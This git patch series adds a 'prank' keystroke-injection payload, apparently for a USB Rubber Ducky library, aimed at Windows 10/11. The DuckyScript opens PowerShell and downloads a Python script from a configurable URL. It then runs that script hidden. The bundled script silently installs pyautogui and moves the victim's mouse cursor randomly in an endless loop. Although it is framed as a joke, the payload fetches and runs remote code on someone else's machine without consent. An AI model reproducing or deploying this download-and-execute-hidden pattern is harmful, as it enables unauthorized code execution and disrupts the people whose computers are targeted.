From 4f4df11487d59153978a719b2c1e70b8721ae872 Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 24 May 2023 10:42:53 +0200 Subject: [PATCH 1/2] The Mouse Moves By Itself --- .../The_Mouse_Moves_By_Itself/payload.txt | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt new file mode 100644 index 0000000..9abbe92 --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt @@ -0,0 +1,35 @@ +REM ############################################ +REM # | +REM # Title : The Mouse Moves By Itself | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Prank | +REM # Target : Windows 10/11 | +REM # | +REM ############################################ + + +REM Requirements: +REM - Internet Connection + + +REM REQUIRED - Set your Python script link +DEFINE SCRIPT-PY-LINK example.com + + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +ENTER +DELAY 500 + +STRING Invoke-WebRequest -Uri " +STRING SCRIPT-PY-LINK +STRING " -OutFile "script.py" +ENTER +DELAY 500 + +STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden +DELAY 1000 +ALT F4 From 80802d110b4e09510d82677083186e9f03fe2787 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Wed, 24 May 2023 10:43:56 +0200 Subject: [PATCH 2/2] README and Script --- .../prank/The_Mouse_Moves_By_Itself/README.md | 21 +++++++++++++++++++ .../prank/The_Mouse_Moves_By_Itself/script.py | 15 +++++++++++++ 2 files changed, 36 insertions(+) create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/README.md create mode 100644 payloads/library/prank/The_Mouse_Moves_By_Itself/script.py diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md new file mode 100644 index 0000000..87f400e --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md @@ -0,0 +1,21 @@ +# The Mouse Moves By Itself + +A script used to prank your friends with the mouse pointer. + +**Category**: Prank + +## Description + +A script used to prank your friends with the mouse pointer. + +Opens a shell, dowloand the Python script that will prank your friends mouving the mouse pointer. + +## Getting Started + +### Dependencies + +* Internet Connection + +### Settings + +- Setup your Python script link in the payload.txt file diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/script.py b/payloads/library/prank/The_Mouse_Moves_By_Itself/script.py new file mode 100644 index 0000000..8443309 --- /dev/null +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/script.py @@ -0,0 +1,15 @@ +import os +try: + import pyautogui +except: + os.system("pip install pyautogui") + import pyautogui +import random +import time + +while True: + # Move the mouse cursor randomly + x_offset = random.randint(-250, 250) + y_offset = random.randint(-250, 250) + pyautogui.moveRel(x_offset, y_offset, duration=0.25) + time.sleep(0.1) # 1 second delay